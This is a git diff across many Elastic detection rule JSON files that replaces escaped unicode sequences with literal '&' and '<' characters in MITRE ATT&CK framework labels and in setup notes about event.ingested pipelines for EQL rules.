diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json index ed93b4a0476..76afd644a4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json index dc75ebb5dd1..687baa96311 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json index 11dcce7dfe4..d5ffc2cf3a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_103.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json index 1c1ef7092a5..731376f17df 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_104.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json index 0e96e994059..a583e50f0dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_105.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json index e311eeda443..37f0ba1db4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_106.json 
@@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json index 6d472f1f997..60e4d910b50 100644 --- a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_107.json 
@@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json index b6a8b6637f0..cc8384f0b84 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json index 8d8a1c77fe3..9b8eecda98f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_2.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json index 12fb0140f7c..4e1f6f95be3 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json index 009e9647889..af824866d49 100644 --- a/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/6951f15e-533c-4a60-8014-a3c3ab851a1b_4.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json index cb10b9e57c7..3ea039418a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json index 62c42b957bd..2d236ad28e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_105.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json index 1d4985c60cd..cdb6ee28270 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_106.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json index 0cf5386e45a..f877da9552b 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_107.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json index dedee4e5ec1..9ec1b054b83 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json index 4d4734a3883..711a453f532 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json index 2830d727c1d..9c58f9c2309 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json index 78084b8514a..aa4c4c128d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json index ffe0c21ea51..ad573e2a465 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json index 9a79fd14e49..52944d4d683 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json index ca17f0e7c32..6ff17e8d96b 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json index cdcf7ae4330..3c880d2b162 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json index abfdfee2839..34d9ec7b2fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json 
@@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json index ed21f4f77bd..6e5d5118c64 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json index 5d08dc0d1a3..7c7e6f476b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json 